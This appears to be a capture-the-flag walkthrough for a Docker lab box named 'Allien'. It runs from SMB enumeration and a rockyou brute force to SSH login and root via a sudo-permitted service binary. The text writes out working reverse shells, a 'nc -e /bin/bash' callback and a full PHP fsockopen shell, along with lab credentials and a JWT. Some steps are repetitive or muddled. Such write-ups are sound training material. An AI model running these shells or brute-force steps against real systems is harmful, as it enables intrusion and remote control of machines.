Skip to main content

Allien

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

SMB Enumeration

Share Enumeration with smbclient

We use smbclient to interact with the SMB service. Let's attempt an anonymous connection to list available shares:

smbclient -L //$TARGET_IP -N
  • -L: Lists services available on the server.
  • -N: Suppresses the password prompt, attempting a null session.

Results:

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        myshare         Disk      Carpeta compartida sin restricciones
        backup24        Disk      Privado
        home            Disk      Produccion
        IPC$            IPC       IPC Service (EseEmeB Samba Server)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

We successfully list available shares anonymously, indicating a potential misconfiguration. Notable shares include myshare, backup24, and home.

Attempting Access to Shares

Let's try to access the IPC$ share anonymously:

smbclient //$TARGET_IP/backup24 -N

Results:

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Oct  6 18:26:40 2024
  ..                                  D        0  Sun Oct  6 18:26:40 2024
  access.txt                          N      956  Sun Oct  6 02:46:26 2024
smb: \> get access.txt
cat access.txt
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InNhdHJpYW5pN0Blc2VlbWViLmRsIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3MjgxNjAzNzMsImV4cCI6MTcyODE2Mzk3MywiandrIjp7Imt0eSI6IlJTQSIsIm4iOiI2MzU4NTI5OTgwNzk4MDM4NzI2MjQyMzYxMjc2NTg2NjE3MzU1MzUyMTMxNjU0ODI2NDI1ODg4NDkzNTU1NDYxNTIyNTc1NTAwNjY0ODY2MDM4OTY4ODMwNTk4OTY0NjUxOTQ2NDEzMzU4OTI1MzU2OTM4MDQwMTE1MjQzMDg4MTg0NTg1MzQxMzY5NTQyNTgxNTQwOTc3MjMzMjU0MTQxNzQ5NzczNDQyODkwNjc3ODY2MjI3NzUyMzEzMzg2OTk1NzA1ODAxNzM0NjA2NDE1NjkyNTM5MjAyNzc5OTczMjczODgyNTc1NTUwMTIwMDc4NjUzNDc0MTU1MjMyMjkwMDAxNjM4NTIwMTExNTUyNjE1NDkwMjQyOTYyMDA4MjYxNDI4NzA0MjAxNjcwOTg0NDUyMjY1NzcwNyIsImUiOjY1NTM3fX0.bQhS5qLCv5bf3sy-oHS7ZGcqqjk3LqyJ5bv-Jw6DIIoSIkmBtiocq07F7joOeKRxS3roWdHEuZUMeHQfWTHwRH7pHqCIBVJObdvHI8WR_Gac_MPYvwd6aSAoNExSlZft1-hXJUWbUIZ683JqEg06VYIap0Durih2rUio4Bdzv68JIo_3M8JFMV6kQTHnM3CElKy-UdorMbTxMQdUGKLk_4C7_FLwrGQse1f_iGO2MTzxvGtebQhERv-bluUYGU3Dq7aJCNU_hBL68EHDUs0mNSPF-f_FRtdENILwF4U14PSJiZBS3e5634i9HTmzRhvCGAqY00isCJoEXC1smrEZpg

access.txt contains a JSON Web Token (JWT), which is commonly used for authentication in web applications. The existence of this token in an SMB share raises security concerns. It may have been placed here insecurely, representing a misconfiguration. The token is associated with the satriani7 user, has role: user and is from the domain eseemeb.dl (https://jwt.io/).

User Enumeration with rpcclient

rpcclient is another powerful tool for interacting with SMB services. We can use it to enumerate users:

rpcclient -U "" -N $TARGET_IP
rpcclient $> enumdomusers
  • -U "": Specifies an empty username for an anonymous connection.

Results:

user:[usuario1] rid:[0x3e8]
user:[usuario3] rid:[0x3ea]
user:[administrador] rid:[0x3ec]
user:[usuario2] rid:[0x3e9]
user:[satriani7] rid:[0x3eb]

We successfully enumerated several users, including administrador (likely an administrator account) and satriani7.

Exploitation

Brute-Force Attack (netexec)

Knowing the usernames, we can attempt a brute-force attack to guess passwords. We'll use netexec, a modern alternative to tools like hydra.

First, create a text file users.txt containing the enumerated usernames:

satriani7
usuario2
administrador
usuario3
usuario1

Then, execute netexec with a password list (e.g., rockyou.txt):

netexec smb $TARGET_IP -u users.txt -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
  • --ignore-pw-decoding: This option was added because there is a bug with the encoding.

Results:

...
SMB         172.17.0.2      445    SAMBASERVER      [+] SAMBASERVER\satriani7:50cent
...

Success! We found valid credentials for the user satriani7:

  • Username: satriani7
  • Password: 50cent

Post-Exploitation

Further Enumeration with Valid Credentials

Now that we have valid credentials, we can perform more in-depth enumeration using smbmap:

smbmap -u 'satriani7' -p '50cent' -H 172.17.0.2

Results:

Disk                                                    Permissions     Comment
----                                                    -----------     -------
myshare                                                 READ ONLY       Carpeta compartida sin restricciones
backup24                                                READ ONLY       Privado
home                                                    NO ACCESS       Produccion
IPC$                                                    NO ACCESS       IPC Service (EseEmeB Samba Server)

This shows that satriani7 has READ ONLY access to myshare and backup24, but no access to home or IPC$.

Accessing Shares and Retrieving Data

We access the backup24 share:

smbclient //172.17.0.2/backup24 -U 'satriani7%50cent'
smb: \Documents\Personal\> get credentials.txt

We find credentials.txt, containing a list of usernames and passwords:

cat credentials.txt
# Archivo de credenciales
Este documento expone credenciales de usuarios, incluyendo la del usuario administrador.
Usuarios:
-------------------------------------------------
1. Usuario: jsmith
   - Contraseña: PassJsmith2024!
2. Usuario: abrown
   - Contraseña: PassAbrown2024!
3. Usuario: lgarcia
   - Contraseña: PassLgarcia2024!
4. Usuario: kchen
   - Contraseña: PassKchen2024!
5. Usuario: tjohnson
   - Contraseña: PassTjohnson2024!
6. Usuario: emiller
   - Contraseña: PassEmiller2024!
7. Usuario: administrador
    - Contraseña: Adm1nP4ss2024   
8. Usuario: dwhite
   - Contraseña: PassDwhite2024!
9. Usuario: nlewis
   - Contraseña: PassNlewis2024!
10. Usuario: srodriguez
   - Contraseña: PassSrodriguez2024!
# Notas:
- Mantener estas credenciales en un lugar seguro.
- Cambiar las contraseñas periódicamente.
- No compartir estas credenciales sin autorización.

This is a critical finding. The file contains credentials for multiple users, including the administrador user.

Privilege Escalation

Gaining Administrator Access

Using the discovered administrador credentials, we can attempt to log in via SSH:

ssh administrador@$TARGET_IP

We are now logged in as the administrador user. We are not root yet.

Creating a Reverse Shell

Start a Netcat listener on your attacking machine:

nc -lvnp 4444

Then, on the target system, execute the following command:

nc -e /bin/bash <YOUR_ATTACKING_IP> 4444
  • Replace <YOUR_ATTACKING_IP> with the IP address of your attacking machine.

This establishes a reverse shell connection, allowing you to execute commands on the target system from your attacking machine.

Privilege Escalation

Using the discovered administrador credentials, we successfully logged in via SSH:

ssh administrador@$TARGET_IP

However, upon checking our privileges with sudo -l, we find that the administrador user does not have root or sudo access. This means we need to find another way to escalate our privileges.

Strategy: PHP Reverse Shell in Web Root

Since we know a web server is running (port 80 was open in our initial Nmap scan), we can try to place a PHP reverse shell in the webroot directory. If we can then trigger the execution of this script by accessing it through a web browser, and if the webserver is running as root, we might be able to gain a root shell.

Creating a PHP Reverse Shell

  1. Locate the Web Root:

    First, we need to find the web root directory. Common locations for web roots include:

    • /var/www/html
    • /var/www
    • /usr/local/apache2/htdocs (for Apache)
    • /usr/share/nginx/html (for Nginx)

    We can use the find command to search for likely directories:

    find / -type d -name "html" 2>/dev/null
    find / -type d -name "www" 2>/dev/null

    We find the web root at /var/www/html.

  2. Crafting the PHP Reverse Shell:

    nano /var/www/html/shell.php
    shell.php
    <?php
    $ip = '<YOUR_ATTACKING_IP>'; // Replace with your attacking machine's IP
    $port = 4444; // Choose any free port you want to use

    $sock=fsockopen($ip, $port);
    $proc=proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
    ?>
    chmod 755 shell.php

Triggering the Reverse Shell

  1. Start a Netcat Listener:

    On your attacking machine, start a Netcat listener to receive the reverse shell connection:

    nc -lvnp 4444

  2. Execute the Shell:

    Open a web browser and navigate to the URL where your PHP shell is located. For example:

    http://<TARGET_IP>/shell.php

    If the web server is running as root and the PHP script is executed successfully, you should see a connection established on your Netcat listener, giving you a root shell.

whoami
> www-data

This does not finish yet

sudo -l
Matching Defaults entries for www-data on 2880b8b6a0e6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on 2880b8b6a0e6:
    (ALL) NOPASSWD: /usr/sbin/service

https://gtfobins.github.io/gtfobins/service/#sudo

sudo service ../../bin/sh

We are root.